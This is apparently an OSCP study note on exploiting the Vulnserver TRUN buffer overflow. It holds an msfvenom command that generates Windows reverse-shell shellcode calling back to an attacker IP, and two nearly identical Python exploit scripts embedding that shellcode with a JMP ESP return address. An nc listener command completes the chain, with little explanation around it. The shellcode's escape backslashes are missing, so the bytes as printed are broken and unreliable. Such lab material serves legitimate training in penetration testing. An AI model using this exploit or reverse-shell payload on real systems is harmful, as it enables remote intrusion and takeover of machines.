OSCP Security Technology - Modifying Shellcode
Generate a shellcode with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "x00" -v buf
buffer.py
#!/usr/bin/python
import socket
import os
import sys
host="192.168.2.34"
port=9999
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "x00" -v buf
# 351 bytes
buf = b""
buf += b"xbbxb0xb5x1bxfbxdbxdaxd9x74x24xf4x5fx29"
buf += b"xc9xb1x52x83xefxfcx31x5fx0ex03xefxbbxf9"
buf += b"x0exf3x2cx7fxf0x0bxadxe0x78xeex9cx20x1e"
buf += b"x7bx8ex90x54x29x23x5ax38xd9xb0x2ex95xee"
buf += b"x71x84xc3xc1x82xb5x30x40x01xc4x64xa2x38"
buf += b"x07x79xa3x7dx7ax70xf1xd6xf0x27xe5x53x4c"
buf += b"xf4x8ex28x40x7cx73xf8x63xadx22x72x3ax6d"
buf += b"xc5x57x36x24xddxb4x73xfex56x0ex0fx01xbe"
buf += b"x5exf0xaexffx6ex03xaex38x48xfcxc5x30xaa"
buf += b"x81xddx87xd0x5dx6bx13x72x15xcbxffx82xfa"
buf += b"x8ax74x88xb7xd9xd2x8dx46x0dx69xa9xc3xb0"
buf += b"xbdx3bx97x96x19x67x43xb6x38xcdx22xc7x5a"
buf += b"xaex9bx6dx11x43xcfx1fx78x0cx3cx12x82xcc"
buf += b"x2ax25xf1xfexf5x9dx9dxb2x7ex38x5axb4x54"
buf += b"xfcxf4x4bx57xfdxddx8fx03xadx75x39x2cx26"
buf += b"x85xc6xf9xe9xd5x68x52x4ax85xc8x02x22xcf"
buf += b"xc6x7dx52xf0x0cx16xf9x0bxc7xd9x56x11x0f"
buf += b"xb2xa4x15x3ex1ex20xf3x2ax8ex64xacxc2x37"
buf += b"x2dx26x72xb7xfbx43xb4x33x08xb4x7bxb4x65"
buf += b"xa6xecx34x30x94xbbx4bxeexb0x20xd9x75x40"
buf += b"x2exc2x21x17x67x34x38xfdx95x6fx92xe3x67"
buf += b"xe9xddxa7xb3xcaxe0x26x31x76xc7x38x8fx77"
buf += b"x43x6cx5fx2ex1dxdax19x98xefxb4xf3x77xa6"
buf += b"x50x85xbbx79x26x8ax91x0fxc6x3bx4cx56xf9"
buf += b"xf4x18x5ex82xe8xb8xa1x59xa9xd9x43x4bxc4"
buf += b"x71xdax1ex65x1cxddxf5xaax19x5exffx52xde"
buf += b"x7ex8ax57x9ax38x67x2axb3xacx87x99xb4xe4"
# 77A373CD FFE4 JMP ESP
buffer = "TRUN /.:/" + "A" * 2003 + "xcdx73xa3x77" + "x90" * 16 + buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()
Run the script.
Modify the script. ("xafx11x50x62")
#!/usr/bin/python
import socket
import os
import sys
host="192.168.2.34"
port=9999
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "x00" -v buf
# 351 bytes
buf = b""
buf += b"xbbxb0xb5x1bxfbxdbxdaxd9x74x24xf4x5fx29"
buf += b"xc9xb1x52x83xefxfcx31x5fx0ex03xefxbbxf9"
buf += b"x0exf3x2cx7fxf0x0bxadxe0x78xeex9cx20x1e"
buf += b"x7bx8ex90x54x29x23x5ax38xd9xb0x2ex95xee"
buf += b"x71x84xc3xc1x82xb5x30x40x01xc4x64xa2x38"
buf += b"x07x79xa3x7dx7ax70xf1xd6xf0x27xe5x53x4c"
buf += b"xf4x8ex28x40x7cx73xf8x63xadx22x72x3ax6d"
buf += b"xc5x57x36x24xddxb4x73xfex56x0ex0fx01xbe"
buf += b"x5exf0xaexffx6ex03xaex38x48xfcxc5x30xaa"
buf += b"x81xddx87xd0x5dx6bx13x72x15xcbxffx82xfa"
buf += b"x8ax74x88xb7xd9xd2x8dx46x0dx69xa9xc3xb0"
buf += b"xbdx3bx97x96x19x67x43xb6x38xcdx22xc7x5a"
buf += b"xaex9bx6dx11x43xcfx1fx78x0cx3cx12x82xcc"
buf += b"x2ax25xf1xfexf5x9dx9dxb2x7ex38x5axb4x54"
buf += b"xfcxf4x4bx57xfdxddx8fx03xadx75x39x2cx26"
buf += b"x85xc6xf9xe9xd5x68x52x4ax85xc8x02x22xcf"
buf += b"xc6x7dx52xf0x0cx16xf9x0bxc7xd9x56x11x0f"
buf += b"xb2xa4x15x3ex1ex20xf3x2ax8ex64xacxc2x37"
buf += b"x2dx26x72xb7xfbx43xb4x33x08xb4x7bxb4x65"
buf += b"xa6xecx34x30x94xbbx4bxeexb0x20xd9x75x40"
buf += b"x2exc2x21x17x67x34x38xfdx95x6fx92xe3x67"
buf += b"xe9xddxa7xb3xcaxe0x26x31x76xc7x38x8fx77"
buf += b"x43x6cx5fx2ex1dxdax19x98xefxb4xf3x77xa6"
buf += b"x50x85xbbx79x26x8ax91x0fxc6x3bx4cx56xf9"
buf += b"xf4x18x5ex82xe8xb8xa1x59xa9xd9x43x4bxc4"
buf += b"x71xdax1ex65x1cxddxf5xaax19x5exffx52xde"
buf += b"x7ex8ax57x9ax38x67x2axb3xacx87x99xb4xe4"
# 77A373CD FFE4 JMP ESP
buffer = "TRUN /.:/" + "A" * 2003 + "xafx11x50x62" + "x90" * 16 + buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()
nc -nvlp 4444
Refer to:
http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/